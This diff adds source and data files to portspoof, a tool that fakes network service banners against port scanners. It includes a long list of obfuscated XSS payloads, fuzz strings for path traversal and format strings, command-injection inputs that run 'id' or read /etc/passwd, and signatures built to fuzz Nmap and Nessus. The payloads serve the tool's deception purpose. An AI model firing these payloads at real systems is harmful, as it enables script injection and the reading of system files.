+<iframe%20%20src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>%20?
+<svg><script%20?>alert(1)
+<iframe%20%20src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
+<img%20src=`xx:xx`onerror=alert(1)>
+<object%20type="text/x-scriptlet"%20data="http://jsfiddle.net/XLE63/%20"></object>
+<meta%20http-equiv="refresh"%20content="0;javascript&colon;alert(1)"/>?
+<math><a%20xlink:href="//jsfiddle.net/t846h/">click
+<embed%20code="http://businessinfo.co.uk/labs/xss/xss.swf"%20allowscriptaccess=always>?
+<svg%20contentScriptType=text/vbs><script>MsgBox+1
+<a%20href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
+<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')%20worksinIE>
+<script>~'\u0061'%20;%20%20\u0074\u0068\u0072\u006F\u0077%20~%20\u0074\u0068\u0069\u0073.%20%20\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script%20U+
+<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script%20a=\u0061%20&%20/=%2F
+<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script%20????????????
+<object%20data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
+<script>+-+-1-+-+alert(1)</script>
+<body/onload=&lt;!--&gt;&#10alert(1)>
+<script%20itworksinallbrowsers>/*<script*%20*/alert(1)</script%20?
+<img%20src%20?itworksonchrome?\/onerror%20=%20alert(1)???
+<svg><script>//&NewLine;confirm(1);</script%20</svg>
+<svg><script%20onlypossibleinopera:-)>%20alert(1)
+<a%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20%20aaaaaaaaa%20aaaaaaaaaa%20%20href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
+<script%20x>%20alert(1)%20</script%201=2
+<div/onmouseover='alert(1)'>%20style="x:">
+<--`<img/src=`%20onerror=alert(1)>%20--!>
+<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>%20?
+<div%20%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20%20onmouseover="prompt(1)"%20onclick="alert(1)">x</button>?
+"><img%20src=x%20onerror=window.open('https://www.google.com/');>
+<form><button%20formaction=javascript&colon;alert(1)>CLICKME
+<math><a%20xlink:href="//jsfiddle.net/t846h/">click
+<object%20data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
+<iframe%20%20src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
+<a%20%20href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click%20%20Me</a>
+"><img%20src=x%20onerror=prompt(1);>
+!'
+!@#$%%^#$%#$@#$%$$@#$%^^**(()
+!@#0%^#0##018387@#0^^**(()
+"><script>"
+">xxx<P>yyy
+"\t"
+#
+#&apos;
+#'
+#xA
+#xA#xD
+#xD
+#xD#xA
+$NULL
+$null
+%
+%00
+%00/
+%01%02%03%04%0a%0d%0aADSF
+%0a
+%20
+%20|
+%2500
+%250a
+%2A
+%2C
+%2e%2e%2f
+%3C%3F
+%5C
+%5C/
+%60
+%7C
+&#10;
+&#10;&#13;
+&#13;
+&#13;&#10;
+&apos;
+&quot;;id&quot;
+(')
+*
+*&apos;
+*'
+*|
++%00
+-
+--
+-1
+-1.0
+-2
+-20
+-268435455
+..%%35%63
+..%%35c
+..%25%35%63
+..%255c
+..%5c
+..%bg%qf
+..%c0%af
+..%u2215
+..%u2216
+../
+..\
+/
+/%00/
+/%2A
+/&apos;
+/'
+0
+00
+0xfffffff
+1
+1.0
+2
+2147483647
+268435455
+65536
+;
+<%20%20script%20>%20<%20/%20script>
+<?
+?x=
+?x="
+?x=>
+?x=|
+@&apos;
+@'
+A
+ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
+FALSE
+NULL
+TRUE
+[&apos;]
+[']
+\
+\"blah
+\&apos;
+\'
+\0
+\00
+\00\00
+\00\00\00
+\0\0
+\0\0\0
+\\
+\\/
+\\\\*
+\\\\?\\
+\t
+^&apos;
+^'
+`
+id%00
+id%00|
+null
+something%00html
+{&apos;}
+{'}
+|
+}

src/src/fuzz_payloads_cmd_exec

@@ -0,0 +1,29 @@
+a);id
+a;id
+a);id;
+a;id;
+a);id|
+a;id|
+a)|id
+a|id
+a)|id;
+a|id
+|/bin/ls -al
+a);/usr/bin/id
+a;/usr/bin/id
+a);/usr/bin/id;
+a;/usr/bin/id;
+a);/usr/bin/id|
+a;/usr/bin/id|
+a)|/usr/bin/id
+a|/usr/bin/id
+a)|/usr/bin/id;
+a|/usr/bin/id
+;system('cat%20/etc/passwd')
+;system('id')
+;system('/usr/bin/id')
+%0Acat%20/etc/passwd
+%0A/usr/bin/id
+%0Aid
+%0A/usr/bin/id%0A
+%0Aid%0A

src/src/ipt

@@ -0,0 +1,21 @@
+# Generated by iptables-save v1.4.4 on Tue Apr 23 14:26:41 2013
+*nat
+:PREROUTING ACCEPT [5992:539002]
+:INPUT ACCEPT [347451:16935290]
+:OUTPUT ACCEPT [477:45868]
+:POSTROUTING ACCEPT [0:0]
+-A PREROUTING -i eth1 -p tcp -m tcp --dport 1:65535 -j REDIRECT --to-ports 4444 
+-A PREROUTING -d 91.220.39.30/32 -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.168.97.1:8080 
+-A PREROUTING -d 91.220.39.30/32 -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.168.97.1:8080 
+-A POSTROUTING -j MASQUERADE 
+-A POSTROUTING -o eth1 -j MASQUERADE 
+COMMIT
+# Completed on Tue Apr 23 14:26:42 2013
+# Generated by iptables-save v1.4.4 on Tue Apr 23 14:26:42 2013
+*filter
+:INPUT ACCEPT [1931192:104113948]
+:FORWARD ACCEPT [0:0]
+:OUTPUT ACCEPT [1606583:151106362]
+-A FORWARD -j ACCEPT 
+COMMIT
+# Completed on Tue Apr 23 14:26:42 2013

src/src/log.cpp

@@ -0,0 +1,49 @@
+#include "log.h"
+#include <syslog.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <unistd.h>
+
+pthread_cond_t log_cond = PTHREAD_COND_INITIALIZER;
+pthread_mutex_t log_mutex = PTHREAD_MUTEX_INITIALIZER;
+
+
+void log_create(const char* file){
+	
+	FILE *fp = fopen(configuration->getLogFile().c_str(), "a");
+		if (fp == NULL) {
+			fp = fopen(configuration->getLogFile().c_str(), "w");
+		}
+	
+	fclose(fp);
+	return;
+	
+}
+void log_write(const char* msg) {
+
+	pthread_mutex_lock(&log_mutex);
+
+	if(configuration->getConfigValue(OPT_LOG_FILE))
+	{
+		FILE *fp = fopen(configuration->getLogFile().c_str(), "a");
+		if (fp == NULL) {
+		    fprintf(stdout,"Error opening file: %s \n",configuration->getLogFile().c_str());
+			exit(1);
+		}
+		
+		fprintf(fp,"%s",msg);
+		fclose(fp);
+		
+	}	
+	
+	if(!(configuration->getConfigValue(OPT_SYSLOG_DIS)))
+	{
+	openlog("portspoof", LOG_PID|LOG_CONS, LOG_USER);
+ 	syslog(LOG_INFO," %s",msg);
+ 	closelog();
+	}
+	pthread_mutex_unlock(&log_mutex);
+	
+	return;
+
+}

src/src/log.h

@@ -0,0 +1,8 @@
+#define MAX_LOG_MSG_LEN 200
+#include "Configuration.h"
+
+class Configuration;
+extern Configuration* configuration;
+
+void log_create(const char* file);
+void log_write(const char* msg);

src/src/main.cpp

@@ -0,0 +1,149 @@
+/*
+ *   portspoof       Service signature obfucastor 
+ *   Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+ *
+ *   This program is free software; you can redistribute it and/or modify it
+ *   under the terms of the GNU General Public License as published by the
+ *   Free Software Foundation; either version 2 of the License, or (at your
+ *   option) any later version.
+ * 
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ *   See the GNU General Public License for more details.
+ * 
+ *   You should have received a copy of the GNU General Public License along
+ *   with this program; if not, see <http://www.gnu.org/licenses>.
+ * 
+ *   Linking portspoof statically or dynamically with other modules is making
+ *   a combined work based on portspoof. Thus, the terms and conditions of
+ *   the GNU General Public License cover the whole combination.
+ * 
+ *   In addition, as a special exception, the copyright holder of portspoof
+ *   gives you permission to combine portspoof with free software programs or
+ *   libraries that are released under the GNU LGPL. You may copy
+ *   and distribute such a system following the terms of the GNU GPL for
+ *   portspoof and the licenses of the other code concerned.
+ * 
+ *   Note that people who make modified versions of portspoof are not obligated
+ *   to grant this special exception for their modified versions; it is their
+ *   choice whether to do so. The GNU General Public License gives permission
+ *   to release a modified version without this exception; this exception
+ *   also makes it possible to release a modified version which carries
+ *   forward this exception.
+ */
+
+
+
+#include <iostream>
+
+using namespace std;
+
+#include <sys/types.h>
+#include <pthread.h>
+#include <sys/timeb.h>
+#include <sys/wait.h>
+#include <err.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <netdb.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <signal.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <net/if.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/if_ether.h>
+#include <Windows.h>
+#include <winsock.h>
+
+
+
+#include "Packets.h"
+#include "PacketsManager.h"
+#include "Configuration.h"
+
+#define MAXBYTES2CAPTURE 1000
+
+PacketsManager* packetsmanager;
+Configuration* configuration;
+
+
+void packet_callback(u_char *useless,const struct pcap_pkthdr* pkthdr,const u_char* packet)
+{
+	 struct ip *ip;
+	 struct tcphdr *tcp;
+	 int ip_len;
+	 unsigned int ip_addr;
+	
+	 ip = (struct ip*)(packet + sizeof(struct ether_header));
+  	 ip_len = (ip->ip_hl & 0x0f) * 4;
+  	 tcp = (struct tcphdr*)(packet + sizeof(struct ether_header) + ip_len);
+
+	 ip_addr=(unsigned int) ip->ip_src.s_addr;
+	
+	 packetsmanager->addKnock(ip_addr,ntohs(tcp->th_dport),configuration);
+
+	
+
+}
+
+int main(int argc, char** argv){
+
+ pcap_t *descr = NULL; 
+ char errbuf[PCAP_ERRBUF_SIZE];
+ memset(errbuf,0,PCAP_ERRBUF_SIZE); 
+ struct bpf_program fp;		/* The compiled filter */
+ bpf_u_int32 mask;		/* Our netmask */
+ bpf_u_int32 net;		/* Our IP */
+ 
+		configuration = new Configuration();
+		
+		if(configuration->readConfigFile())
+			exit(1);
+			
+		if(configuration->processArgs(argc,argv))
+			exit(1);
+			
+		packetsmanager = new PacketsManager();
+		cout<<"Device: "<<configuration->getDevice().c_str()<<endl;
+		cout<<"Filter: "<<configuration->getFilter().c_str()<<endl;
+		
+
+		/* Find the properties for the device */
+		if (pcap_lookupnet(configuration->getDevice().c_str(), &net, &mask, errbuf) == -1) {
+			fprintf(stdout,"Couldn't get netmask for device %s: %s\n", configuration->getDevice().c_str(), errbuf);
+			net = 0;
+			mask = 0;
+		}
+		
+		//promisc mode.
+		if ( (descr = pcap_open_live(configuration->getDevice().c_str(), BUFSIZ, 1,  512, errbuf)) == NULL){
+	    	fprintf(stdout,"ERROR: %s\n", errbuf);
+	    	exit(1);
+	 	}
+	
+		cout<<"Promisc mode set"<<endl;
+	
+		if (pcap_compile(descr, &fp, configuration->getFilter().c_str(), 0, net) == -1) { 
+			 fprintf(stdout,"Couldn't parse filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
+	    	 exit(1);
+		 }
+		 if (pcap_setfilter(descr, &fp) == -1) {
+			 fprintf(stdout,"Couldn't install filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
+	    	 exit(1);
+		 }
+	 	
+		cout<<"Listening..."<<endl;
+		pcap_loop(descr,-1,packet_callback,NULL);
+	    return 0;
+}

src/src/nmapfuzzsignatures

@@ -0,0 +1,4 @@
+550 4m2v4 (__FUZZ__)
++OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ__/xxx.\r\n
+220 __FUZZ__ ESMTP OpenSMTPD\r\n
+HTTP/1.0 200 OK\n<HTML><HEAD><TITLE>__FUZZ__'s desktop</TITLE></HEAD>\n<BODY>\n<APPLET CODE=vncviewer/VNCViewer.class ARCHIVE=vncviewer.jar WIDTH=44 HEIGHT=44>\n\t<param name=PORT value=4444>\n</APPLET>\n</BODY></HTML>\n

src/src/nmapfuzzsignatures2

@@ -0,0 +1 @@
+550 4m2v4 (__FUZZ__/,8085/open/tcp//smtp/dupa/)\r\n

src/src/nmapfuzzsignatures3

@@ -0,0 +1,4 @@
+550 4m2v4 __FUZZ__
++OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ__/xxx.\r\n
+220 __FUZZ__ ESMTP OpenSMTPD\r\n
+HTTP/1.0 200 OK\n<HTML><HEAD><TITLE>__FUZZ__'s desktop</TITLE></HEAD>\n<BODY>\n<APPLET CODE=vncviewer/VNCViewer.class ARCHIVE=vncviewer.jar WIDTH=44 HEIGHT=44>\n\t<param name=PORT value=4444>\n</APPLET>\n</BODY></HTML>\n

src/src/nmapfuzzsignatures4

@@ -0,0 +1 @@
+550 4m2v4 __FUZZ__

src/src/nmapfuzzsignatures_acu

@@ -0,0 +1 @@
+HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>

src/src/nmapfuzzsignatures_http

@@ -0,0 +1,4 @@
+550 4m2v4 (__FUZZ__)
++OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ__/xxx.\r\n
+220 __FUZZ__ ESMTP OpenSMTPD\r\n
+HTTP/1.0 200 OK\n<HTML><HEAD><TITLE>__FUZZ__'s desktop</TITLE></HEAD>\n<BODY>\n<APPLET CODE=vncviewer/VNCViewer.class ARCHIVE=vncviewer.jar WIDTH=44 HEIGHT=44>\n\t<param name=PORT value=4444>\n</APPLET>\n</BODY></HTML>\n

src/src/nmapfuzzsignatures_nessus

@@ -0,0 +1 @@
+220 __FUZZ__ SMTP ready to roll\r\n

src/src/portspoof.conf

@@ -0,0 +1,53 @@
+#This is an example signature mapping configuration file
+
+#Send custom payload (this can be a simple string)
+1 "550 12345 0000000000000000000000000000000000000000000000000000000"
+2 "550 12345 0000000000000000000000000000000000000000000000000000000"
+3 "550 12345 0000000000000000000000000000000000000000000000000000000"
+4 "550 12345 0000000000000000000000000000000000000000000000000000000"
+5 "550 12345 0000000000000000000000000000000000000000000000000000000"
+6 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
+7 "550 12345 0fffffffffffff777778887777777777cffffffffffffffffffff00"
+8 "550 12345 0fffffffffff8000000000000000008888887cfcfffffffffffff00"
+9 "550 12345 0ffffffffff80000088808000000888800000008887ffffffffff00"
+10 "550 12345 0fffffffff70000088800888800088888800008800007ffffffff00"
+11 "550 12345 0fffffffff000088808880000000000000088800000008fffffff00"
+12 "550 12345 0ffffffff80008808880000000880000008880088800008ffffff00"
+13 "550 12345 0ffffffff000000888000000000800000080000008800007fffff00"
+14 "550 12345 0fffffff8000000000008888000000000080000000000007fffff00"
+15 "550 12345 0ffffff70000000008cffffffc0000000080000000000008fffff00"
+16 "550 12345 0ffffff8000000008ffffff007f8000000007cf7c80000007ffff00"
+17 "550 12345 0fffff7880000780f7cffff7800f8000008fffffff80808807fff00"
+18 "550 12345 0fff78000878000077800887fc8f80007fffc7778800000880cff00"
+19 "550 12345 0ff70008fc77f7000000f80008f8000007f0000000000000888ff00"
+20 "550 12345 0ff0008f00008ffc787f70000000000008f000000087fff8088cf00"
+21 "550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00"
+22 "550 12345 0f8008c008fff8000000000000780000007f800087708000800ff00"
+23 "550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00"
+24 "550 12345 0f7000f888f8007ff7800000770877800000cf780000ff00807ff00"
+25 "550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00"
+26 "550 12345 0ff70800008ff800f007fff70880000087f70000007fcf7007fff00"
+27 "550 12345 0fff70000007fffcf700008ffc778000078000087ff87f700ffff00"
+28 "550 12345 0ffffc000000f80fff700007787cfffc7787fffff0788f708ffff00"
+29 "550 12345 0fffff7000008f00fffff78f800008f887ff880770778f708ffff00"
+30 "550 12345 0ffffff8000007f0780cffff700000c000870008f07fff707ffff00"
+31 "550 12345 0ffffcf7000000cfc00008fffff777f7777f777fffffff707ffff00"
+32 "550 12345 0cccccff0000000ff000008c8cffffffffffffffffffff807ffff00"
+33 "550 12345 0fffffff70000000ff8000c700087fffffffffffffffcf808ffff00"
+34 "550 12345 0ffffffff800000007f708f000000c0888ff78f78f777c008ffff00"
+35 "550 12345 0fffffffff800000008fff7000008f0000f808f0870cf7008ffff00"
+36 "550 12345 0ffffffffff7088808008fff80008f0008c00770f78ff0008ffff00"
+37 "550 12345 0fffffffffffc8088888008cffffff7887f87ffffff800000ffff00"
+38 "550 12345 0fffffffffffff7088888800008777ccf77fc777800000000ffff00"
+39 "550 12345 0fffffffffffffff800888880000000000000000000800800cfff00"
+40 "550 12345 0fffffffffffffffff70008878800000000000008878008007fff00"
+41 "550 12345 0fffffffffffffffffff700008888800000000088000080007fff00"
+42 "550 12345 0fffffffffffffffffffffc800000000000000000088800007fff00"
+43 "550 12345 0fffffffffffffffffffffff7800000000000008888000008ffff00"
+44 "550 12345 0fffffffffffffffffffffffff7878000000000000000000cffff00"
+45 "550 12345 0ffffffffffffffffffffffffffffffc880000000000008ffffff00"
+46 "550 12345 0ffffffffffffffffffffffffffffffffff7788888887ffffffff00"
+47 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
+48 "550 12345 0000000000000000000000000000000000000000000000000000000"
+49 "550 12345 0000000000000000000000000000000000000000000000000000000"
+50 "550 12345 0000000000000000000000000000000000000000000000000000000"

src/src/portspoof.cpp

@@ -0,0 +1,227 @@
+/*
+ *   portspoof       Service signature obfucastor 
+ *   Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+ *
+ *   This program is free software; you can redistribute it and/or modify it
+ *   under the terms of the GNU General Public License as published by the
+ *   Free Software Foundation; either version 2 of the License, or (at your
+ *   option) any later version.
+ * 
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ *   See the GNU General Public License for more details.
+ * 
+ *   You should have received a copy of the GNU General Public License along
+ *   with this program; if not, see <http://www.gnu.org/licenses>.
+ * 
+ *   Linking portspoof statically or dynamically with other modules is making
+ *   a combined work based on portspoof. Thus, the terms and conditions of
+ *   the GNU General Public License cover the whole combination.
+ * 
+ *   In addition, as a special exception, the copyright holder of portspoof
+ *   gives you permission to combine portspoof with free software programs or
+ *   libraries that are released under the GNU LGPL. You may copy
+ *   and distribute such a system following the terms of the GNU GPL for
+ *   portspoof and the licenses of the other code concerned.
+ * 
+ *   Note that people who make modified versions of portspoof are not obligated
+ *   to grant this special exception for their modified versions; it is their
+ *   choice whether to do so. The GNU General Public License gives permission
+ *   to release a modified version without this exception; this exception
+ *   also makes it possible to release a modified version which carries
+ *   forward this exception.
+ */
+
+
+#include <sys/types.h>
+#include <pthread.h>
+#include <sys/timeb.h>
+#include <sys/wait.h>
+#include <err.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <netdb.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <signal.h>
+
+#include "revregex.h"
+#include "threads.h"
+#include "connection.h"
+#include "log.h"
+
+Configuration* configuration;
+
+pthread_cond_t new_connection_cond = PTHREAD_COND_INITIALIZER;
+pthread_mutex_t new_connection_mutex = PTHREAD_MUTEX_INITIALIZER;
+
+
+int choose_thread()
+{
+	int i=MAX_THREADS-1;
+	int min = i;
+	while(i >=0)
+	{
+		if(threads[i].client_count < threads[min].client_count)
+		{
+			min = i;
+		}
+		i--;
+	}		
+
+	if(threads[min].client_count==MAX_CLIENT_PER_THREAD)
+		return -1;
+	
+	return min;
+}
+
+int main(int argc, char **argv)
+{
+
+	int sockd,newsockfd;
+	int addrlen;
+	//int pid;
+	struct sockaddr_in my_name, peer_name;
+	int status;
+
+	
+	configuration = new Configuration();
+		
+	if(configuration->processArgs(argc,argv))
+		exit(1);
+		
+	if(configuration->processSignatureFile())
+		exit(1);
+		
+	if(configuration->readConfigFile())
+		exit(1);
+	
+	/*	
+	if(configuration->getConfigValue(OPT_FUZZ_NMAP))
+	{
+		if(configuration->PrepareFuzzer())
+		{
+		fprintf(stdout,"Fuzzer prepare failed!\n");
+		fflush(stdout);
+		exit(1);
+		}
+		
+		fprintf(stdout,"-> Preparing fuzzer!\n");
+		
+	}
+	*/
+	
+
+	//check log file
+	if(configuration->getConfigValue(OPT_LOG_FILE))
+		log_create(configuration->getLogFile().c_str());
+
+	// open file	
+	if(configuration->getConfigValue(OPT_SIG_FILE))
+	fprintf(stdout,"-> Using user defined signature file %s\n",configuration->getSignatureFile().c_str());
+	fflush(stdout);
+	
+ 	/* create thread pool */
+	for(int i = 0; i < MAX_THREADS; i++)
+	{
+		pthread_create(&threads[i].tid, NULL, &process_connection, (void *) i);
+		threads[i].client_count = 0;
+	}
+		
+	/* create a socket */
+	sockd = socket(PF_INET, SOCK_STREAM, 0);
+	if (sockd == -1)
+	{
+	perror("Socket creation error");
+	exit(1);
+	}
+
+	 int n = 1;
+	 setsockopt(sockd, SOL_SOCKET, SO_REUSEADDR , &n, sizeof(n));
+
+	/* server address  - by default localhost */
+	  my_name.sin_family = PF_INET;
+	  if(configuration->getConfigValue(OPT_IP))
+	   {
+			fprintf(stdout,"-> Binding to iface: %s\n",configuration->getBindIP().c_str());
+			inet_aton(configuration->getBindIP().c_str(), &my_name.sin_addr);
+		 
+		}
+	  else
+		my_name.sin_addr.s_addr = INADDR_ANY; 
+	  
+	  if(configuration->getConfigValue(OPT_PORT))
+		{
+			fprintf(stdout,"-> Binding to port: %d\n",configuration->getPort());
+			my_name.sin_port = htons(configuration->getPort());
+			
+		}
+	  else 
+	  my_name.sin_port = htons(DEFAULT_PORT);
+
+	  status = bind(sockd, (struct sockaddr*)&my_name, sizeof(my_name));
+	  if (status == -1)
+	  {
+	    perror("Binding error");
+	    exit(1);
+	  }
+
+	  // Set queue sizeof
+	  status = listen(sockd, 10);
+	  if (status == -1)
+	  {
+	    perror("Listen set error");
+	    exit(1);
+	  }
+	  int choosen;
+	  while(1)
+	  { 
+	    /* wait for a connection */
+	    addrlen = sizeof(peer_name);
+	    newsockfd = accept(sockd, (struct sockaddr*)&peer_name,(socklen_t*) &addrlen);
+		
+		
+        if (newsockfd < 0)
+	    perror("ERROR on accept");
+	    else{
+		
+			nonblock(newsockfd); 
+	    	
+			start:
+            pthread_mutex_lock(&new_connection_mutex);
+			choosen=choose_thread();
+
+
+	    	if( choosen == -1)
+				{
+					pthread_mutex_unlock(&new_connection_mutex);
+					sleep(1);
+					goto start;
+				}
+						
+
+			if(configuration->getConfigValue(OPT_DEBUG))
+            fprintf(stdout," new conn - thread choosen: %d -  nr. of connections already in queue: %d\n",choosen,threads[choosen].client_count);
+			fflush(stdout);
+			
+			for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
+			{
+				if(threads[choosen].clients[i] == 0)
+				{
+					threads[choosen].clients[i] = newsockfd;
+					threads[choosen].client_count++;
+					break;
+				}
+			}
+	     pthread_mutex_unlock(&new_connection_mutex);
+			}
+			
+	    
+	  }
+
+	return 0;
+}

src/src/portspoof.h

@@ -0,0 +1,35 @@
+/*
+ *   portspoof       Service signature obfucastor 
+ *   Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+ *
+ *   This program is free software; you can redistribute it and/or modify it
+ *   under the terms of the GNU General Public License as published by the
+ *   Free Software Foundation; either version 2 of the License, or (at your
+ *   option) any later version.
+ * 
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ *   See the GNU General Public License for more details.
+ * 
+ *   You should have received a copy of the GNU General Public License along
+ *   with this program; if not, see <http://www.gnu.org/licenses>.
+ * 
+ *   Linking portspoof statically or dynamically with other modules is making
+ *   a combined work based on portspoof. Thus, the terms and conditions of
+ *   the GNU General Public License cover the whole combination.
+ * 
+ *   In addition, as a special exception, the copyright holder of portspoof
+ *   gives you permission to combine portspoof with free software programs or
+ *   libraries that are released under the GNU LGPL. You may copy
+ *   and distribute such a system following the terms of the GNU GPL for
+ *   portspoof and the licenses of the other code concerned.
+ * 
+ *   Note that people who make modified versions of portspoof are not obligated
+ *   to grant this special exception for their modified versions; it is their
+ *   choice whether to do so. The GNU General Public License gives permission
+ *   to release a modified version without this exception; this exception
+ *   also makes it possible to release a modified version which carries
+ *   forward this exception.
+ */
+

src/src/portspoof2.conf

@@ -0,0 +1,8 @@
+#TODO
+#Send message to Nmap scanners (will be visible as an extracted Banner )
+9000 NMAP:"What are you looking for?"
+
+#Send random data on port 3000 (try to crash the scanner)
+#3000 random
+#Send random data on port 3001-3010 (try to crash the scanner)
+#3001-3010 random

src/src/revregex.cpp

@@ -0,0 +1,663 @@
+/*
+ *   portspoof       Service signature obfucastor 
+ *   Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
+ *
+ *   This program is free software; you can redistribute it and/or modify it
+ *   under the terms of the GNU General Public License as published by the
+ *   Free Software Foundation; either version 2 of the License, or (at your
+ *   option) any later version.
+ * 
+ *   This program is distributed in the hope that it will be useful,
+ *   but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ *   See the GNU General Public License for more details.
+ * 
+ *   You should have received a copy of the GNU General Public License along
+ *   with this program; if not, see <http://www.gnu.org/licenses>.
+ * 
+ *   Linking portspoof statically or dynamically with other modules is making
+ *   a combined work based on portspoof. Thus, the terms and conditions of
+ *   the GNU General Public License cover the whole combination.
+ * 
+ *   In addition, as a special exception, the copyright holder of portspoof
+ *   gives you permission to combine portspoof with free software programs or
+ *   libraries that are released under the GNU LGPL. You may copy
+ *   and distribute such a system following the terms of the GNU GPL for
+ *   portspoof and the licenses of the other code concerned.
+ * 
+ *   Note that people who make modified versions of portspoof are not obligated
+ *   to grant this special exception for their modified versions; it is their
+ *   choice whether to do so. The GNU General Public License gives permission
+ *   to release a modified version without this exception; this exception
+ *   also makes it possible to release a modified version which carries
+ *   forward this exception.
+ */
+
+#include "revregex.h"
+
+ int signatures[SIGNATURES_SIZE];
+ int num_signatures=30;
+ struct signature **arr_lines2;
+
